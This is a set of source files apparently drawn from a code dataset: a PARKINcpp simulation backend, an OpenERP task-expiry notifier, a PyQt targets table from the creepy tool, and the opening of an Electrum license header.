# # 21.08.12 td : an awkward trail to get the two logging systems (dlib::logger & logging), somehow unified
# self.bioProcessor.setLogStream(MakeCppOStream(sys.stdout))
def _doSimulation(self):
"""
Entry point to start a normal forward computation run.
"""
if not self.bioSystem:
logging.debug("ParkinCppBackend._doSimulation invoked without a bioSystem.")
return False
if not self.bioProcessor:
logging.debug("ParkinCppBackend._doSimulation invoked without a BioProcessor.")
return False
rawSimData = self._computeTimecourse()
simDataSet = self._handleSimulationResults(rawSimData)
self.dataService.add_data(simDataSet)
return True
def _computeTimecourse(self):
"""
Does a single forward calculation and puts the results
into some class variables.
"""
logging.info("Computing Timecourse...")
trajectoryMap = self.bioProcessor.computeModel()
# extract the computed solution vectors
tp = self.bioProcessor.getAdaptiveTimepoints()
self.timepointsPruned = [tp.t()[i] for i in xrange(tp.nr())]
self.timepoints = [self.settings[backend.settingsandvalues.SETTING_STARTTIME]] + self.timepointsPruned
simResults = OrderedDict()
for speciesId in trajectoryMap.keys():
correspondingSpecies = self.mainModel.getSpecies(speciesId)
if correspondingSpecies: # 09.08.12 td: what happens with DAE entries??? They have no SBML corresponding IDs
dataTuple = trajectoryMap[speciesId]
data = list(dataTuple)
data.insert(0, correspondingSpecies.getInitialValue())
simResults[correspondingSpecies] = data
return simResults
def _handleSimulationResults(self, simResults):
"""
        Structures the data so that the DataService can make use of it.
"""
logging.info("Handling simulation results...")
dataSet = DataSet(None) # no filename given
dataSet.setType(services.dataservice.SIMULATION)
dataSet.setId(settingsandvalues.SIMULATION_RESULTS)
dataSet.setSelected(True)
for speciesEntity, data in simResults.items():
entityData = EntityData()
entityData.setId(speciesEntity.getId())
entityData.setType(datamanagement.entitydata.TYPE_SIMULATED)
entityData.setAssociatedDataSet(dataSet)
entityData.setSelected(True)
entityData.timepoints = self.timepoints
entityData.datapoints = data
entityData.dataDescriptorName = "Timepoint"
# can't set dataDescriptorUnit here because the backend knows nothing about it
# TODO: Handle DataDescriptorUnit
entityData.sbmlEntity = speciesEntity
dataSet.setData(entityData, keyEntity=speciesEntity)
return dataSet
def _handleSensitivityResults(self, sensResults):
"""
        Structures the sensitivity data so that the DataService can make use of it.
"""
logging.info("Handling sensitivity results...")
dataSet = DataSet(None) # no filename given
dataSet.setType(services.dataservice.SENSITIVITY_DETAILS_SUBCONDITION)
dataSet.setId(settingsandvalues.SENSITIVITY_RAW_JACOBIAN)
dataSet.setSelected(True)
for (speciesEntity, paramID), data in sensResults.items():
entityData = EntityData()
entityData.setId("%s/%s" % (speciesEntity.getId(), paramID))
entityData.setType(datamanagement.entitydata.TYPE_SIMULATED)
entityData.setAssociatedDataSet(dataSet)
entityData.setSelected(True)
entityData.timepoints = self.timepoints
entityData.datapoints = data
entityData.dataDescriptorName = "Timepoint"
# can't set dataDescriptorUnit here because the backend knows nothing about it
# TODO: Handle DataDescriptorUnit
entityData.sbmlEntity = speciesEntity
dataSet.setData(entityData, keyEntity=speciesEntity)
return dataSet
def _computeSensitivityOverview(self):
"""
Computing the sensitivities of parameters using the
PARKINcpp library.
"""
logging.info("Computing Sensitivity Overview...")
self.report_progress(text="Computing Sensitivity Overview...")
isSetUp = self._setUpBioProcessor(mode = TASK_SENSITIVITY_OVERVIEW)
if not isSetUp:
logging.error("Could not start sensitivity computation.")
return False
if not self.bioProcessor:
return False
# # set up FORTRAN console capturing
# # found here: http://stackoverflow.com/questions/977840/redirecting-fortran-called-via-f2py-output-in-python
# # open 2 fds
# #null_fds = [os.open(os.devnull, os.O_RDWR) for x in xrange(2)]
# null_fds = [os.open("d:/test%s.txt" % x, os.O_RDWR) for x in xrange(2)]
# # save the current file descriptors to a tuple
# save = os.dup(1), os.dup(2)
# # put /dev/null fds on 1 and 2
# os.dup2(null_fds[0], 1)
# os.dup2(null_fds[1], 2)
self.bioProcessor.computeSensitivityTrajectories() # compute non-scaled trajectories but don't use them
self.sensitivityTrajectoryMap = self.bioProcessor.getScaledSensitivityTrajectories() # always get the scaled trajectories
if not self.sensitivityTrajectoryMap:
logging.error("Computation of Sensitivity Overview failed. Empty trajectory map returned.")
return False
# update timepoints to those that were actually used (generated) during sensitivity calculations
tp = self.bioProcessor.getAdaptiveTimepoints()
self.timepointsPruned = [tp.t()[i] for i in xrange(tp.nr())]
self.timepoints = [self.settings[backend.settingsandvalues.SETTING_STARTTIME]] + self.timepointsPruned
# # 2nd part of FORTRAN console capturing
# # restore file descriptors so I can print the results
# os.dup2(save[0], 1)
# os.dup2(save[1], 2)
# # close the temporary fds
# os.close(null_fds[0])
# os.close(null_fds[1])
dataSets = {}
for key, dataPoints in self.sensitivityTrajectoryMap.items():
if len(dataPoints) == 0:
logging.error("No trajectory for %s" % key)
continue
splitKey = key.split(" / ")
speciesId = splitKey[0]
paramId = splitKey[1]
if not dataSets.has_key(paramId):
dataSet = DataSet(None) # no filename given
dataSet.setType(services.dataservice.SENSITIVITY_OVERVIEW)
dataSet.setId(paramId)
dataSet.setSelected(True)
dataSets[paramId] = dataSet
self.dataService.add_data(dataSet)
else:
dataSet = dataSets[paramId]
speciesEntity = self.mainModel.getSpecies(speciesId)
if not speciesEntity.getComputeSensitivity(): # don't save data of non-selected species
continue
entityData = EntityData()
entityData.setId(speciesId)
entityData.setType(datamanagement.entitydata.TYPE_SENSITIVITY_OVERVIEW)
entityData.setAssociatedDataSet(dataSet)
entityData.setSbmlEntity(speciesEntity)
entityData.setSelected(True)
entityData.timepoints = self.timepointsPruned
entityData.datapoints = list(dataPoints)
entityData.dataDescriptorName = "Timepoint"
# can't set dataDescriptorUnit here because the backend knows nothing about it
# TODO: Handle DataDescriptorUnit
dataSet.setData(entityData, keyEntity=speciesId)
# logging.debug("Adding data for Species %s" % speciesId)
logging.info("Finished computing Sensitivity Overview...")
return True
def _computeSensitivityDetails(self):
logging.info("Computing Detailed Sensitivities...")
isSetUp = self._setUpBioProcessor(mode = TASK_SENSITIVITIES_DETAILS)
if not isSetUp:
logging.error("Could not start sensitivity computation.")
return False
if not self.bioProcessor:
return False
if not self.sensitivityTimepoints:
logging.debug("ParkinCppBackend._computeSensitivityDetails(): No timepoints set, aborting.")
logging.error("No timepoints given. Please provide some.")
return False
logging.debug("ParkinCppBackend._computeSensitivityDetails(): Setting timepoints for detailed sensitivities to %s" % self.sensitivityTimepoints)
self.sensitivityTimepointsVector = Vector(ValueList(self.sensitivityTimepoints))
logging.debug("ParkinCppBackend._computeSensitivityDetails(): About to prepare detailed sensitivities...")
errorInt = self.bioProcessor.prepareDetailedSensitivities(self.sensitivityTimepointsVector)
if errorInt != 0:
logging.error("Could not prepare detailed sensitivities. Return code: %s" % errorInt)
return False
qrConDecompVector = self.bioProcessor.getSensitivityDecomps()
rawJacobianMatrixVector = self.bioProcessor.getSensitivityMatrices() # gets raw Jacobian matrix
for i, qrConDecomp in enumerate(qrConDecompVector):
timepoint = self.sensitivityTimepoints[i]
subconditionDataSet = self._computeSensSubconditions(qrConDecomp, timepoint)
rank = qrConDecomp.getRank()
logging.info("Rank of matrix at timepoint %s: %s" % (timepoint, rank))
self.dataService.add_data(subconditionDataSet)
for i, rawJacobianMatrix in enumerate(rawJacobianMatrixVector):
timepoint = self.sensitivityTimepoints[i]
speciesParameterSensitivity = self._handleJacobianMatrix(rawJacobianMatrix, timepoint)
self.dataService.add_data(speciesParameterSensitivity)
logging.info("Finished computing Detailed Sensitivities...")
return True
def _handleJacobianMatrix(self, rawJacobian, timepoint):
"""
The raw Jacobian matrix will be packed into EntityData objects (one per Parameter).
        The resulting output is wrapped into a DataSet structure.
"""
if type(rawJacobian) is not Matrix:
logging.debug("parkinCppBackend._computeSpeciesParameterSens: Didn't get a Matrix as input.")
return None
numSpecies = len(self.odeManager.odeList)
if (rawJacobian.nr() % numSpecies != 0):
logging.debug("parkinCppBackend._computeSpeciesParameterSens: Wrong format of raw Jacobian.")
return None
logging.info("Preparing sensitivity data for timepoint %s..." % timepoint)
listOfSpecies = self.bioSystem.getSpecies()
speciesParameterSensitivity = DataSet(None)
speciesParameterSensitivity.setId("%s | Timepoint %s" % (settingsandvalues.SENSITIVITY_PER_PARAM_AND_SPECIES, timepoint))
speciesParameterSensitivity.setType(services.dataservice.SENSITIVITY_DETAILS_JACOBIAN)
speciesParameterSensitivity.setSelected(True)
for k, param in enumerate(self.selectedParams): # needed to get Param object corresponding to index
jacobianColumn = rawJacobian.colm(k+1) # note: type(rawJacobian)==Matrix starts counting with 1, not with 0
paramID = param.getCombinedId()
sensData = [abs(jacobianColumn[j]) for j in xrange(jacobianColumn.nr())] # convert Vector to list
paramSpeciesData = EntityData()
paramSpeciesData.setAssociatedDataSet(speciesParameterSensitivity)
paramSpeciesData.setId("Sensitivity of Parameter %s for timepoint %s" % (paramID, timepoint))
paramSpeciesData.setType(datamanagement.entitydata.TYPE_SENSITIVITY_DETAILS_JACOBIAN)
paramSpeciesData.dataDescriptors = listOfSpecies
paramSpeciesData.datapoints = sensData
paramSpeciesData.setSelected(True)
speciesParameterSensitivity.setData(paramSpeciesData, keyEntity=param)
return speciesParameterSensitivity
def _computeSensSubconditions(self, qr, timepoint):
"""
Takes the qr-decomposed matrix and computes subconditions. This method
then puts the resulting data into a DataSet.
"""
if type(qr) is not QRconDecomp:
            logging.debug("ParkinCppBackend._computeSensSubconditions: Didn't get a QRconDecomp as input.")
return None
logging.info("Computing Subconditions...")
diagonals = qr.getDiag()
rank = qr.getRank() # not used right now
logging.info("QR decomposition rank: %s" % rank)
        logging.debug("QR decomposition diag: %s" % diagonals.t())
pivotIndices = qr.getPivot()
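        # Worked example with assumed values: for diag = [4.0, 2.0, 0.5] and rank 3,
        # the loop below yields column subconditions |4/4|, |4/2|, |4/0.5| = [1.0, 2.0, 8.0];
        # scaling by the maximum (8.0) then gives [0.125, 0.25, 1.0].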
colSubconditions = []
firstDiag = abs(diagonals[0])
for i in xrange(len(diagonals)):
diagEntry = abs(diagonals[i])
if diagEntry != 0.0 and i < rank:
colSubcondition = firstDiag / diagEntry
colSubconditions.append(colSubcondition)
else:
colSubconditions.append(float("nan"))
maxValue = max(colSubconditions)
colSubconditionsScaled = []
for i in xrange(len(colSubconditions)):
oldValue = colSubconditions[i]
if math.isnan(oldValue):
scaledValue = oldValue # push "nan" through to the end; should be handled by Views
else:
scaledValue = oldValue / maxValue
colSubconditionsScaled.append(scaledValue)
# 4th: put into DataSet
subconditionsDataSet = DataSet(None)
subconditionsDataSet.setId("%s | Timepoint %s" % (settingsandvalues.SENSITIVITY_SUBCONDITION_PER_PARAM, timepoint))
subconditionsDataSet.setType(services.dataservice.SENSITIVITY_DETAILS_SUBCONDITION)
subconditionsDataSet.setSelected(True)
for i in xrange(len(colSubconditionsScaled)):
paramIndex = int(pivotIndices[i] - 1) # pivot elements are counted 1-based
param = self.selectedParams[paramIndex]
subconditionScaled = colSubconditionsScaled[i]
subconditionAbs = colSubconditions[i]
paramData = EntityData()
paramData.setAssociatedDataSet(subconditionsDataSet)
paramData.setId("Sensitivity Subcondition of Parameter %s at timepoint %s" % (param.getCombinedId(), timepoint))
paramData.setType(datamanagement.entitydata.TYPE_SENSITIVITY_DETAILS_SUBCONDITION)
paramData.dataDescriptors = ["Subcondition (as %% of %g)" % maxValue, settingsandvalues.SUBCONDITION_HEADER_ABSOLUTE]
paramData.datapoints = [subconditionScaled, subconditionAbs]
paramData.setSelected(True)
subconditionsDataSet.setData(paramData, keyEntity=param)
return subconditionsDataSet
def _setUpBioProcessor(self, mode = TASK_PARAMETER_IDENTIFICATION):
"""
Further prepares the BioSystem so that it can be used by a GaussNewton object.
Also creates said GaussNewton object and all the input it needs.
"""
# get selected parameters (exclude non-constant ones, e.g. with assignm. rules)
if mode == TASK_PARAMETER_IDENTIFICATION:
self.selectedParams = [param for param, isSelected in self.paramToEstimateMap.items() if isSelected and param.isConstant()]
elif mode == TASK_SENSITIVITY_OVERVIEW or mode == TASK_SENSITIVITIES_DETAILS:
self.selectedParams = [param for param, isSelected in self.paramToSensitivityMap.items() if isSelected and param.isConstant()]
if not self.selectedParams:
logging.error("No parameters selected.")
return False
if mode == TASK_PARAMETER_IDENTIFICATION:
self.timepointVector, self.measurementMapVector = self._getBioParkinCppCompatibleMeasurements()
if not self.measurementMapVector or not self.timepointVector:
logging.debug("ParkinCppBackend._doParameterEstimation(): Could not obtain timepoints and/or datapoints.")
return False
self.bioSystem.setMeasurementList(self.timepointVector, self.measurementMapVector)
# set up parameters for BioProcessor
self.paramMap = Param()
self.paramThresholdMap = Param()
for selectedParam in self.selectedParams:
combinedID = selectedParam.getCombinedId() # includes "scope_"
value = self.mainModel.getValueFromActiveSet(combinedID)
self.paramMap[combinedID] = value
thres = selectedParam.getThreshold()
if not thres:
logging.error("There are Parameters for which thresholds have not been set. Computing sensitivities is not possible without thresholds. Please, set thresholds!")
return False
self.paramThresholdMap[combinedID] = thres
#
self.bioProcessor.setCurrentParamValues(self.paramMap)
self.bioProcessor.setCurrentParamThres(self.paramThresholdMap)
# set up Species thresholds
self.speciesThresholdMap = Param()
for species in self.odeManager.speciesList:
speciesID = species.getId()
thres = species.getThreshold()
if not thres:
continue
self.speciesThresholdMap[speciesID] = thres
if self.speciesThresholdMap:
self.bioProcessor.setCurrentSpeciesThres(self.speciesThresholdMap)
self.iOpt = self.bioProcessor.getIOpt()
self.iOpt.mode = 0 # 0:normal run, 1:single step
self.iOpt.jacgen = int(self.settings[settingsandvalues.SETTING_JACOBIAN]) # 1:user supplied Jacobian, 2:num.diff., 3:num.diff.(with feedback)
self.iOpt.qrank1 = False # allow Broyden rank-1 updates if __true__
self.iOpt.nonlin = int(self.settings[settingsandvalues.SETTING_PROBLEM_TYPE]) # 1:linear, 2:mildly nonlin., 3:highly nonlin., 4:extremely nonlin.
self.iOpt.rscal = int(self.settings[settingsandvalues.SETTING_RESIDUAL_SCALING]) # 1:use unchanged fscal, 2:recompute/modify fscal, 3:use automatic scaling only
self.iOpt.mprmon = 2
self.iOpt.mprerr = 1
self.iOpt.itmax = int(self.settings[backend.settingsandvalues.SETTING_MAX_NUM_NEWTON_STEPS])
self.bioProcessor.setIOpt(self.iOpt)
        # consider constraints for both parameter identification *and* sensitivities
# global constraints
globalConstraintsType = self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS]
trans, upperbounds, lowerbounds = [],[],[]
if not self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS_PER_PARAMETER]:
trans = [settingsandvalues.OPTIONS_PARAMETER_CONSTRAINT_TYPES.index(globalConstraintsType)] * len(self.selectedParams)
lowerbounds = [self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS_LOWERBOUND]] * len(self.selectedParams)
upperbounds = [self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS_UPPERBOUND]] * len(self.selectedParams)
else: #local constraints
for selectedParam in self.selectedParams:
typeInt = settingsandvalues.OPTIONS_PARAMETER_CONSTRAINT_TYPES.index(str(selectedParam.getConstraintType()))
trans.append(typeInt)
lowerbounds.append(float(selectedParam.getConstraintLowerBound()))
upperbounds.append(float(selectedParam.getConstraintUpperBound()))
trans = Vector(ValueList(trans))
lowerbounds = Vector(ValueList(lowerbounds))
upperbounds = Vector(ValueList(upperbounds))
self.bioProcessor.setParameterConstraints(trans, lowerbounds, upperbounds)
return True
def _doParameterEstimation(self):
"""
Create the Gauss Newton object (involves calling ._setUpGaussNewton())
and run the parameter identification.
"""
isSetUp = self._setUpBioProcessor(mode = TASK_PARAMETER_IDENTIFICATION)
if not isSetUp:
logging.error("Could not start parameter identification.")
return False
if not self.bioProcessor:
return False
xtol = float(self.settings[settingsandvalues.SETTING_XTOL])
# 21.08.12 td : counterpart of logging unification test
out = StdOutWrapper()
self.bioProcessor.setLogStream(MakeCppOStream(sys.stdout))
error = self.bioProcessor.identifyParameters(xtol=xtol)
out.close()
# 24.07.12 td
# condition error == 0 for successful convergence is too much to ask
# if error != 0:
if error > 2:
logging.error("Error during parameter identification in PARKINcpp.")
return False
paramMap = self.bioProcessor.getIdentificationResults()
# convert results; put into class variable
self.estimatedParams = OrderedDict()
for paramID, value in paramMap.items():
self.estimatedParams[paramID] = value
# 26.04.12 td
# compute RMS values according to available measurement points and
        # for each species separately (in relation!)
measMapVector = self.bioSystem.getMeasurementList()
synMapVector = self.bioSystem.getSimTrajectoryList()
if measMapVector and synMapVector:
logging.info("------------------------------")
logging.info("Computing relative RMS values.")
self.relRMS = OrderedDict()
countMeas = 0
for i in xrange(len(measMapVector)):
measPointMap = measMapVector[i]
synPointMap = synMapVector[i]
for speciesID in measPointMap.keys():
(measVal, weight) = measPointMap[speciesID]
if speciesID in synPointMap:
(synVal, dummy) = synPointMap[speciesID]
else:
continue
dval = 0.0
countMeas += 1
                    if float(weight) != 0.0 and not math.isnan(float(weight)):
dval = (float(measVal) - float(synVal)) / float(weight)
if speciesID in self.relRMS.keys():
self.relRMS[speciesID] += dval*dval
else:
self.relRMS[speciesID] = dval*dval
if countMeas > 0:
totRMS = sum([self.relRMS[spec] for spec in self.relRMS.keys()])
logging.info(" Total RMS**2: %e" % (float(totRMS)/float(countMeas)) )
for speciesID, rmsValue in self.relRMS.items():
logging.info(" (%5.2f%%) %e = relRMS[%s]**2 " % (
100.0*float(rmsValue)/float(totRMS), float(rmsValue)/float(countMeas), speciesID) )
else:
logging.warning(" No measurements present?!? ")
logging.info("------------------------------")
return True # computation successful
def _getBioParkinCppCompatibleMeasurements(self):
"""
Takes experimental data from the DataService and puts it into PARKINcpp classes.
"""
# get the currently loaded experimental data
dataService = DataService()
        expData = dataService.get_selected_experimental_data() # gets the *datasets* that are selected (in the data browser)
if not expData or len(expData.items()) == 0:
logging.debug("ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): No Experimental Data.")
logging.info("No experimental data loaded. Can't estimate parameter values.")
return None, None
# Step 1: Create a global timepoint list. The number of times any timepoint occurs is the
        # maximum of occurrences within the Species.
timepointList = []
for dataSetID, dataSet in expData.items():
logging.debug("ParkinCppBacken._getBioParkinCppCompatibleMeasurements(): Getting timepoints from %s" % dataSetID)
for sbmlSpecies, entityData in dataSet.getData().items():
if not entityData.isSelected(): # ignores entity data that is not selected (i.e. non-selected columns in the data browser)
continue
speciesTimepointsList = []
speciesTimepointsSet = set()
for i, dataDescriptor in enumerate(entityData.dataDescriptors):
try:
if type(sbmlSpecies) is SBMLEntity:
speciesID = sbmlSpecies.getId()
else:
speciesID = str(sbmlSpecies)
timepoint = float(dataDescriptor)
# ignore timepoints that are outside of the current integration interval
if timepoint <= self.settings[settingsandvalues.SETTING_STARTTIME]\
or timepoint > self.settings[settingsandvalues.SETTING_ENDTIME]:
continue
speciesTimepointsList.append(timepoint) # may be unordered
speciesTimepointsSet.add(timepoint)
except Exception, e:
logging.debug(
"ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): Problem while creating global timepoint list with Species %s" % speciesID)
# Check timepoints of this Species and add them to the global list if needed.
for timepoint in speciesTimepointsSet:
countSpecies = speciesTimepointsList.count(timepoint)
countGlobal = timepointList.count(timepoint)
if countSpecies > countGlobal: # if this timepoint isn't included in the global list often enough
difference = countSpecies - countGlobal
toAdd = [timepoint for i in range(difference)]
timepointList.extend(toAdd) # add it as often as is needed
timepointList.sort() # sort timepoints ascending
# Step 2: Go through the local timepoints of each Species and put their data into the correct places in the global list
# prepare list with empty MeasurementPoints
datapointList = []
for i in xrange(len(timepointList)):
datapointList.append(MeasurementPoint())
for dataSetID, dataSet in expData.items():
#logging.debug("ODEManager: Getting timepoints from %s" % dataSetID)
for sbmlSpecies, entityData in dataSet.getData().items():
if not entityData.isSelected(): # ignores entity data that is not selected (i.e. non-selected columns in the data browser)
continue
countTimepoints = {}
for i, dataDescriptor in enumerate(entityData.dataDescriptors):
try:
if type(sbmlSpecies) is SBMLEntity:
speciesID = sbmlSpecies.getId()
else:
speciesID = str(sbmlSpecies)
timepoint = float(dataDescriptor)
# ignore timepoints that are outside of the current integration interval
if timepoint <= self.settings[settingsandvalues.SETTING_STARTTIME]\
or timepoint > self.settings[settingsandvalues.SETTING_ENDTIME]:
continue
# 31.07.12 td
# ignore datapoint if not set/loaded at all
if not entityData.datapoints[i]:
continue
dataPoint = float(entityData.datapoints[i])
# 26.07.12 td
try:
thres = abs(sbmlSpecies.getThreshold())
except:
thres = 0.0
try:
weightRaw = entityData.getWeights()[i]
weight = max( abs(float(weightRaw)), thres )
# weight /= sbmlSpecies.getThreshold()
# except: # take user-defined value if no float was provided by the loaded data
# weight = float(self.settings[settingsandvalues.SETTING_SD_SPECIES])
# 25.07.12 td
except: # take datapoint value if no float was provided by the loaded data (as in YeOldeParkin!)
weight = max( abs(dataPoint), thres )
except Exception, e:
logging.debug(
"ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): Problem while getting data of Species %s" % speciesID)
try:
if timepoint in countTimepoints.keys(): # already had this timepoint at least once
# handle non-unique timepoint
index = timepointList.index(timepoint) #always gets the first occurence of that timepoint
index += countTimepoints[timepoint] # this should yield the correct index
if speciesID in datapointList[index].keys():
logging.debug(
"ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): MeasurementPoint entry for Species %s at timepoint %s already there." % (
speciesID, timepoint))
datapointList[index][speciesID] = (dataPoint, weight)
countTimepoints[timepoint] += 1
else:
# handle new timepoint
index = timepointList.index(timepoint)
datapointList[index][speciesID] = (dataPoint, weight)
countTimepoints[timepoint] = 1
except Exception, e:
logging.debug("ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): Error while trying to assign Species datapoint to global data list. Error: %s" % e)
measurementMapVector = MeasurementList(len(datapointList))
for i in xrange(len(datapointList)):
measurementMapVector[i] = datapointList[i]
timepointVector = Vector(ValueList(timepointList))
return (timepointVector, measurementMapVector)
def _handleEstimatedParamResults(self):
"""
        Takes the previously computed parameter values (stored in an OrderedDict), wraps
them into EntityData objects and a DataSet and puts that into the DataService.
"""
estimatedParamSet = DataSet(None)
estimatedParamSet.setId("Identified Parameter Values")
estimatedParamSet.setType(services.dataservice.ESTIMATED_PARAMS)
selected = {}
for selectedParam in self.selectedParams:
selected[selectedParam.getCombinedId()] = selectedParam
for i, (paramID, estimatedValue) in enumerate(self.estimatedParams.items()):
if not paramID in selected.keys():
continue
param = selected[paramID] # if paramID is in selected dict, get the related sbmlEntity object
paramData = EntityData()
paramData.setId(param.getId())
paramData.setType(datamanagement.entitydata.TYPE_PARAMETERS_ESTIMATED)
paramData.setAssociatedDataSet(estimatedParamSet)
paramData.dataDescriptors = ["Identified Value"]
paramData.datapoints = [estimatedValue]
paramData.sbmlEntity = param
estimatedParamSet.setData(paramData, keyEntity=param)
self.dataService.add_data(estimatedParamSet)
| lgpl-3.0 | 6,877,674,015,434,271,000 | 44.678694 | 192 | 0.643596 | false |
iw3hxn/LibrERP | task_expired_information/model/task.py | 1 | 5561 | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
#
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2016 Didotech SRL
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from openerp.osv import fields, osv
from openerp.tools import html2text
from datetime import *
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
import logging
_logger = logging.getLogger('task')
class task_expired_config(osv.Model):
"""
"""
_name = 'task.expired.config'
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
res = super(task_expired_config, self).default_get(cr, uid, fields,
context=context)
model_ids = self.search(cr, uid, [], context=context)
if model_ids:
return self.read(cr, uid, model_ids[0], [], context=context)
return res
_columns = {
'without_change': fields.integer('Without Changes Days',
                                         help='Number of days that tasks may '
                                              'remain without changes.\n'
                                              'When this period ends, an '
                                              'email notification is sent'),
'before_expiry': fields.integer('Before Expiry',
                                        help='Number of days before the '
                                             'expiry date at which to send '
                                             'an email alert'),
'without_change_tmpl_id': fields.many2one('email.template', 'Template Without Changes', domain="[('model_id', '=', 'project.task')]", required=True),
        'before_expiry_tmpl_id': fields.many2one('email.template', 'Template Before Expiry', domain="[('model_id', '=', 'project.task')]", required=True)
}
def create_config(self, cr, uid, ids, context=None):
if context is None:
context = {}
model_ids = self.search(cr, uid, [], context=context)
dict_read = self.read(cr, uid, ids[0], [], context=context)
if model_ids:
self.write(cr, uid, model_ids, {
'before_expiry': dict_read.get('before_expiry'),
                'without_change_tmpl_id': dict_read.get('without_change_tmpl_id')[0],
'without_change': dict_read.get('without_change'),
'before_expiry_tmpl_id': dict_read.get('before_expiry_tmpl_id')[0],
}, context=context)
return {'type': 'ir.actions.act_window_close'}
return {'type': 'ir.actions.act_window_close'}
def send_expiration_message(self, cr, uid, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
message_obj = self.pool['mail.message']
task_obj = self.pool['project.task']
work_obj = self.pool['project.task.work']
config_ids = self.search(cr, uid, [], context=context)
if config_ids:
config_brw = self.browse(cr, uid, config_ids[0], context=context)
today = date.today()
before_expiry = today + timedelta(days=config_brw.before_expiry)
last_change = today - timedelta(days=config_brw.without_change)
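            # A task counts as unchanged if its last work entry or message is dated on
            # or before `last_change`; a reminder is due when its deadline falls exactly
            # `before_expiry` days from today (see the checks further below).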
today = today.strftime('%Y-%m-%d')
before_expiry = before_expiry.strftime('%Y-%m-%d')
last_change = last_change.strftime('%Y-%m-%d')
task_ids = task_obj.search(cr, uid, [('state', 'not in', ('done', 'cancelled'))], context=context)
for task in task_obj.browse(cr, uid, task_ids, context):
no_change = False
near_deadline = False
last_message_ids = message_obj.search(cr, uid, [('res_id', '=', task.id), ('model', '=', 'project.task')], context=context, order='date desc')
last_fecha = last_message_ids and message_obj.browse(cr, uid, last_message_ids[0]).date
if work_obj.search(cr, uid, [('date', '<=', last_change), ('task_id', '=', task.id)], context=context) or last_fecha and last_fecha <= last_change:
no_change = True
if task.date_deadline and task.date_deadline == before_expiry:
near_deadline = True
if no_change:
self.pool['email.template'].send_mail(cr, uid, config_brw.without_change_tmpl_id.id, task.id, force_send=False, context=context)
_logger.info(u'Sent Email without change for {name} #{task_id}, email notification sent.'.format(name=self._name, task_id=task.id))
if near_deadline:
self.pool['email.template'].send_mail(cr, uid, config_brw.before_expiry_tmpl_id.id, task.id, force_send=False, context=context)
_logger.info(u'Sent Email near deadline for {name} #{task_id}, email notification sent.'.format(name=self._name, task_id=task.id))
return True
| agpl-3.0 | 1,825,388,067,127,048,000 | 48.651786 | 163 | 0.579392 | false |
jkakavas/creepy | creepy/models/ProjectWizardPossibleTargetsTable.py | 1 | 3572 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from PyQt4.QtCore import QVariant, QAbstractTableModel, Qt
from PyQt4.Qt import QPixmap, QIcon, QMimeData, QByteArray, QDataStream, QIODevice
import os
from utilities import GeneralUtilities
class ProjectWizardPossibleTargetsTable(QAbstractTableModel):
def __init__(self, targets, parents=None):
super(ProjectWizardPossibleTargetsTable, self).__init__()
self.targets = targets
def rowCount(self, index):
return len(self.targets)
def columnCount(self, index):
return 5
def headerData(self, section, orientation, role=Qt.DisplayRole):
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return QVariant(int(Qt.AlignLeft|Qt.AlignVCenter))
return QVariant(int(Qt.AlignRight|Qt.AlignVCenter))
if role != Qt.DisplayRole:
return QVariant()
if orientation == Qt.Horizontal:
if section == 0:
return QVariant('Plugin')
elif section == 1:
return QVariant('Picture')
elif section == 2:
return QVariant('Username')
elif section == 3:
return QVariant('Full Name')
elif section == 4:
return QVariant('User Id')
return QVariant(int(section + 1))
def data(self, index, role):
target = self.targets[index.row()]
if index.isValid() and (0 <= index.row() < len(self.targets)) and target:
column = index.column()
if role == Qt.DecorationRole:
if column == 1:
picturePath = os.path.join(GeneralUtilities.getTempDir(),
target['targetPicture'])
if picturePath and os.path.exists(picturePath):
pixmap = QPixmap(picturePath)
return QIcon(pixmap.scaled(30, 30, Qt.IgnoreAspectRatio, Qt.FastTransformation))
else:
pixmap = QPixmap(':/creepy/user')
pixmap.scaled(20, 20, Qt.IgnoreAspectRatio)
return QIcon(pixmap)
if role == Qt.DisplayRole:
if column == 0:
return QVariant(target['pluginName'])
elif column == 1:
return QVariant()
elif column == 2:
return QVariant(target['targetUsername'])
elif column == 3:
return QVariant(target['targetFullname'])
elif column == 4:
return QVariant(target['targetUserid'])
else:
return QVariant()
def flags(self, index):
if not index.isValid():
return Qt.ItemIsEnabled
return Qt.ItemFlags(QAbstractTableModel.flags(self, index) | Qt.ItemIsDragEnabled|Qt.ItemIsDropEnabled)
def mimeTypes(self):
return ['application/target.tableitem.creepy']
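    # The custom MIME type above is what the wizard's drop targets accept;
    # together with the drag/drop item flags this presumably allows dragging
    # candidate targets from this table into the selected-targets table.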
def mimeData(self, indices):
mimeData = QMimeData()
encodedData = QByteArray()
stream = QDataStream(encodedData, QIODevice.WriteOnly)
for index in indices:
if index.column() == 1:
d = QVariant(self.data(index, Qt.DecorationRole))
else:
d = QVariant(self.data(index, Qt.DisplayRole).toString())
stream << d
mimeData.setData('application/target.tableitem.creepy', encodedData)
return mimeData | gpl-3.0 | -1,807,698,924,184,300,300 | 39.602273 | 111 | 0.555431 | false |
fyookball/electrum | gui/qt/request_list.py | 1 | 7117 | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
